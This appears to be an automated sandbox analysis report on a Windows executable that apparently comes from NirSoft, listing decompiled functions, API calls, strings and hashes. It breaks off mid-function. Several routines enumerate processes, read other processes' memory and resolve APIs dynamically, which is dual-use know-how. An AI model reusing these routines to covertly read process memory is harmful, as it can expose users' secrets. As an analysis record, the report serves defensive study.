GetProcAddress.KERNEL32(00000000,Module32First), ref: 00409127
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00409138
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00409149
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040915A

Strings

Module32Next, xrefs: 00409132
CreateToolhelp32Snapshot, xrefs: 00409110
Process32First, xrefs: 00409143
Process32Next, xrefs: 00409154
Module32First, xrefs: 00409121
kernel32.dll, xrefs: 004090F8

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction ID: 22745fca4ee5753030f6263dae9a7fe791be1dfa5e14f8ddaef7bf0c79e2feda
Opcode Fuzzy Hash: 684ed8b1756a354eaa76eb9bf25297defa38c2621817bb94c0e51767f3dc11ec
Instruction Fuzzy Hash: D6F01D71F41313EAE761AB786E84F673AF85A85B44714403BA804F53D9EB7C8C46CA6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409F9C, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00409F9C(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					L0040B1EC();
					 *((long long*)(_t61 + 0x2c)) = _a16;
					L0040B1EC();
					_t39 =  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v1540,  &_v1028, 0xff,  &_v1028, 0xff,  &_v516,  &_v516, 0xff, L"%%0.%df", _a8);
					if (_t39 != 0) goto L3;
					return _t39;
				}
				_v516 = 0;
				memset( &_v514, ??, ??);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fe);
				L0040B1EC();
				 *((long long*)(_t61 + 0x20)) =  *_a12;
				L0040B1EC();
				return  *((intOrPtr*)( *_t50 + 0x10))(_a4,  &_v516, 0x40c4e8, 0xff,  &_v516, 0xff,  &_v1028,  &_v1028, 0xff, L"%%0.%df", _a8);
			}

0x00409faf
0x00409fb4
0x00409fb5
0x00409fb6
0x0040a043
0x0040a04a
0x0040a058
0x0040a05f
0x0040a06d
0x0040a074
0x0040a08e
0x0040a099
0x0040a0ab
0x0040a0c9
0x0040a0ce
0x00000000
0x0040a0ce
0x00409fc3
0x00409fca
0x00409fd8
0x00409fdf
0x00409ff9
0x0040a006
0x0040a018
0x00000000

APIs

memset.MSVCRT ref: 00409FCA
memset.MSVCRT ref: 00409FDF
_snwprintf.MSVCRT ref: 00409FF9
_snwprintf.MSVCRT ref: 0040A018
memset.MSVCRT ref: 0040A04A
memset.MSVCRT ref: 0040A05F
memset.MSVCRT ref: 0040A074
_snwprintf.MSVCRT ref: 0040A08E
_snwprintf.MSVCRT ref: 0040A0AB

Strings

%%0.%df, xrefs: 00409FEC, 0040A081

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction ID: 9f87d91c1f60d09641f67b426c6f30a2a5dee33008317eed3759a4a42041cb36
Opcode Fuzzy Hash: 9c1d8227a7254b2b345134e9c44fb34bf141cbad45bd10bf7a91d83f6708c758
Instruction Fuzzy Hash: 61315D72940129AADB20DF95CC89FEB777CEF49344F0004FAB509B6152D7349A94CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040620E, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E0040620E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, struct HWND__* _a8, WCHAR* _a12) {
				void _v8202;
				short _v8204;
				void* _t27;
				short _t29;
				short _t40;
				void* _t41;
				struct HMENU__* _t43;
				short _t50;
				void* _t52;
				struct HMENU__* _t59;

				E0040B550(0x2008, __ecx);
				_t65 = _a8 - 4;
				if(_a8 != 4) {
					__eflags = _a8 - 5;
					if(_a8 == 5) {
						_t50 =  *0x40fe2c; // 0x0
						__eflags = _t50;
						if(_t50 == 0) {
							L8:
							_push(_a12);
							_t27 = 5;
							E00405E8D(_t27);
							_t29 = CreateDialogParamW(_a4, _a12, 0, E00406209, 0);
							__eflags = _t29;
							_a8 = _t29;
							if(_t29 == 0) {
								_a8 = CreateDialogParamW(_a4, _a12, GetDesktopWindow(), E00406209, 0);
							}
							_v8204 = 0;
							memset( &_v8202, 0, 0x2000);
							GetWindowTextW(_a8,  &_v8204, 0x1000);
							__eflags = _v8204;
							if(__eflags != 0) {
								E00405FAC(__eflags, L"caption",  &_v8204, 0);
							}
							EnumChildWindows(_a8, E0040614F, 0);
							DestroyWindow(_a8);
						} else {
							while(1) {
								_t40 =  *_t50;
								__eflags = _t40;
								if(_t40 == 0) {
									goto L8;
								}
								__eflags = _t40 - _a12;
								if(_t40 != _a12) {
									_t50 = _t50 + 4;
									__eflags = _t50;
									continue;
								}
								goto L13;
							}
							goto L8;
						}
					}
				} else {
					_push(_a12);
					_t41 = 4;
					E00405E8D(_t41);
					_pop(_t52);
					_t43 = LoadMenuW(_a4, _a12);
					 *0x40fe20 =  *0x40fe20 & 0x00000000;
					_t59 = _t43;
					_push(1);
					_push(_t59);
					_push(_a12);
					E0040605E(_t52, _t65);
					DestroyMenu(_t59);
				}
				L13:
				return 1;
			}

0x00406216
0x0040621b
0x00406222
0x0040625f
0x00406263
0x00406269
0x00406271
0x00406273
0x00406289
0x00406289
0x0040628e
0x0040628f
0x004062a9
0x004062ab
0x004062ad
0x004062b0
0x004062c3
0x004062c3
0x004062d3
0x004062da
0x004062f1
0x004062f7
0x004062fe
0x0040630d
0x00406312
0x0040631e
0x00406327
0x00406275
0x00406283
0x00406283
0x00406285
0x00406287
0x00000000
0x00000000
0x00406277
0x0040627a
0x00406280
0x00406280
0x00000000
0x00406280
0x00000000
0x0040627a
0x00000000
0x00406283
0x00406273
0x00406224
0x00406224
0x00406229
0x0040622a
0x0040622f
0x00406236
0x0040623c
0x00406243
0x00406245
0x00406247
0x00406248
0x0040624b
0x00406254
0x00406254
0x0040632d
0x00406334

APIs

LoadMenuW.USER32 ref: 00406236

Part of subcall function 0040605E: GetMenuItemCount.USER32 ref: 00406074
Part of subcall function 0040605E: memset.MSVCRT ref: 00406093
Part of subcall function 0040605E: GetMenuItemInfoW.USER32 ref: 004060CF
Part of subcall function 0040605E: wcschr.MSVCRT ref: 004060E7

DestroyMenu.USER32(00000000), ref: 00406254
CreateDialogParamW.USER32 ref: 004062A9
GetDesktopWindow.USER32 ref: 004062B4
CreateDialogParamW.USER32 ref: 004062C1
memset.MSVCRT ref: 004062DA
GetWindowTextW.USER32 ref: 004062F1
EnumChildWindows.USER32 ref: 0040631E
DestroyWindow.USER32(00000005), ref: 00406327

Part of subcall function 00405E8D: _snwprintf.MSVCRT ref: 00405EB2

Strings

caption, xrefs: 00406308

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction ID: 5799234da4ec4704710f53c86087676007739614705d168b27d1301efcd7018e
Opcode Fuzzy Hash: f0dbf22cb8dfb05ce39814170fe8d0dcd326ef21813c42225809b1f658733472
Instruction Fuzzy Hash: D2316171900208FFEF11AF94DC859AF3B69FB04314F11847AF90AA51A1D7758964CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004081E4, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E004081E4(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void _v2050;
				char _v2052;
				void _v4098;
				long _v4100;
				void _v6146;
				char _v6148;
				void* __esi;
				void* _t43;
				intOrPtr* _t49;
				intOrPtr* _t57;
				void* _t58;
				void* _t59;
				intOrPtr _t62;
				intOrPtr _t63;

				_t49 = __ecx;
				E0040B550(0x1800, __ecx);
				_t57 = _t49;
				E00407343(_t57, _a4, L"<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 3.2 Final//EN\">\r\n");
				_v4100 = 0;
				memset( &_v4098, 0, 0x7fe);
				_v2052 = 0;
				memset( &_v2050, 0, 0x7fe);
				_v6148 = 0;
				memset( &_v6146, 0, 0x7fe);
				_t59 = _t58 + 0x24;
				_t62 =  *0x40fe30; // 0x0
				if(_t62 != 0) {
					_push(0x40fe30);
					_push(L"<meta http-equiv=\'content-type\' content=\'text/html;charset=%s\'>");
					_push(0x400);
					_push( &_v2052);
					L0040B1EC();
					_t59 = _t59 + 0x10;
				}
				_t63 =  *0x40fe28; // 0x0
				if(_t63 != 0) {
					wcscpy( &_v4100, L"<table dir=\"rtl\"><tr><td>\r\n");
				}
				E00407AFD(_t57, _t57, _a4,  *((intOrPtr*)( *_t57 + 0x20))(),  &_v2052,  &_v4100);
				_push( *((intOrPtr*)( *_t57 + 0x90))( *((intOrPtr*)( *_t57 + 0x8c))()));
				_push(L"<br><h4>%s <a href=\"http://www.nirsoft.net/\" target=\"newwin\">%s</a></h4><p>");
				_push(0x400);
				_push( &_v6148);
				L0040B1EC();
				_t43 = E00407343(_t57, _a4,  &_v6148);
				_t64 = _a8 - 5;
				if(_a8 == 5) {
					return E00407D03(_t57, _t64, _a4);
				}
				return _t43;
			}

0x004081e4
0x004081ec
0x004081fc
0x00408200
0x00408215
0x0040821c
0x0040822a
0x00408231
0x0040823f
0x00408246
0x0040824b
0x0040824e
0x0040825a
0x0040825c
0x00408261
0x0040826c
0x0040826d
0x0040826e
0x00408273
0x00408273
0x00408276
0x0040827c
0x0040828a
0x00408290
0x004082ab
0x004082c5
0x004082c6
0x004082d1
0x004082d2
0x004082d3
0x004082e7
0x004082ec
0x004082f0
0x00000000
0x004082f5
0x004082fe

APIs

memset.MSVCRT ref: 0040821C
memset.MSVCRT ref: 00408231
memset.MSVCRT ref: 00408246
_snwprintf.MSVCRT ref: 0040826E
wcscpy.MSVCRT ref: 0040828A
_snwprintf.MSVCRT ref: 004082D3

Strings

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 004081F4
<table dir="rtl"><tr><td>, xrefs: 00408284
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 004082C6
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00408261

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction ID: b93c0f476eae2b4120c079c2f39cbc6d180985b1aedf8bde3229837f55527c2f
Opcode Fuzzy Hash: 31debdc799413e4dd011bdb917084947cf92358cc83d1d17746b8cf035e2114d
Instruction Fuzzy Hash: 5C2157769001186ACB21AB95CC45FEE77BCFF48745F0440BEB549B3191DB389B848BAD

Uniqueness

Uniqueness Score: -1.00%

Function 0040920A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040920A(wchar_t* __edi, wchar_t* __esi) {
				void _v526;
				long _v528;
				wchar_t* _t17;
				signed int _t40;
				wchar_t* _t50;

				_t50 = __edi;
				if(__esi[0] != 0x3a) {
					_t17 = wcschr( &(__esi[1]), 0x3a);
					if(_t17 == 0) {
						_t40 = E0040488D(__esi, L"\\systemroot");
						if(_t40 < 0) {
							if( *__esi != 0x5c) {
								wcscpy(__edi, __esi);
							} else {
								_v528 = 0;
								memset( &_v526, 0, 0x208);
								E00404C08( &_v528);
								memcpy(__edi,  &_v528, 4);
								__edi[1] = __edi[1] & 0x00000000;
								wcscat(__edi, __esi);
							}
						} else {
							_v528 = 0;
							memset( &_v526, 0, 0x208);
							E00404C08( &_v528);
							wcscpy(__edi,  &_v528);
							wcscat(__edi, __esi + 0x16 + _t40 * 2);
						}
						L11:
						return _t50;
					}
					_push( &(_t17[0]));
					L4:
					wcscpy(_t50, ??);
					goto L11;
				}
				_push(__esi);
				goto L4;
			}

0x0040920a
0x00409218
0x00409223
0x0040922c
0x0040924b
0x00409253
0x0040929b
0x004092e4
0x0040929d
0x004092a3
0x004092b1
0x004092bd
0x004092cc
0x004092d1
0x004092d8
0x004092dd
0x00409255
0x0040925b
0x00409269
0x00409275
0x00409282
0x0040928d
0x00409292
0x004092ec
0x004092ef
0x004092ef
0x00409231
0x00409232
0x00409233
0x00000000
0x00409239
0x0040921a
0x00000000

APIs

wcschr.MSVCRT ref: 00409223
wcscpy.MSVCRT ref: 00409233

Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1

wcscpy.MSVCRT ref: 00409282
wcscat.MSVCRT ref: 0040928D
memset.MSVCRT ref: 00409269

Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E

memset.MSVCRT ref: 004092B1
memcpy.MSVCRT ref: 004092CC
wcscat.MSVCRT ref: 004092D8

Strings

\systemroot, xrefs: 00409240

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE

Uniqueness

Uniqueness Score: -1.00%

Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}

0x00409c73
0x00409c7c
0x00409c90
0x00409c9f
0x00409ca2
0x00409ca7
0x00409ca9
0x00409cb1
0x00409cc0
0x00409cc2
0x00409cc7
0x00409ccf
0x00409cd0
0x00409cd7
0x00409cd8
0x00409cd9
0x00409cda
0x00409cdc
0x00409ce0
0x00409ce1
0x00409ce9
0x00409cf1
0x00409cfb
0x00409d08
0x00409d08
0x00000000
0x00409d0d
0x00409d0f

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
strlen.MSVCRT ref: 00409CE4
strlen.MSVCRT ref: 00409CF1

Strings

GetProcAddress, xrefs: 00409C98, 00409C9D
ntdll.dll, xrefs: 00409CB3
LdrGetProcedureAddress, xrefs: 00409CBA
kernel32.dll, xrefs: 00409C8B

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProcstrlen
String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
API String ID: 1027343248-2054640941
Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t48;
				void* _t56;
				signed int _t57;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
						E004055D1(_t61,  &_v28);
					}
					E004055D1(CloseHandle(_a16),  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401bee
0x00401bf0
0x00401bf0
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 2567117392-2565891505
Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}

0x004045c2
0x004045d1
0x004045da
0x004045ef
0x004045f6
0x00404604
0x0040460b
0x00404610
0x00404616
0x00404617
0x00404618
0x00404628
0x00404629
0x0040462a
0x0040462f
0x00404630
0x00404631
0x0040463c
0x0040463d
0x0040463e
0x00404656
0x00404662
0x0040466b
0x0040466d
0x0040466e
0x00404674
0x00404679

APIs

memset.MSVCRT ref: 004045F6
memset.MSVCRT ref: 0040460B
_snwprintf.MSVCRT ref: 0040462A
_snwprintf.MSVCRT ref: 0040463E
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404656
RegDeleteKeyW.ADVAPI32(?,?), ref: 00404662
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,0002001F,?,?,00403904), ref: 0040466E

Strings

%s\shell\%s, xrefs: 00404631
%s\shell\%s\command, xrefs: 00404618

Memory Dump Source

Source File: 00000007.00000002.691475734.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.691466925.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691503856.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.691516159.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.691528138.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete_snwprintfmemset$Close
String ID: %s\shell\%s$%s\shell\%s\command
API String ID: 1018939227-3575174989
Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED

Uniqueness

Uniqueness Score: -1.00%

Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}

0x0040314a
0x00403151
0x00403158
0x0040315a
0x00403162
0x00403166
0x00403190
0x00403190
0x00403198
0x00403199
0x0040319e
0x004031bb
0x004031a0
0x004031ad
0x004031b6
0x004031b6
0x0040319e
0x0040316e
0x00403176
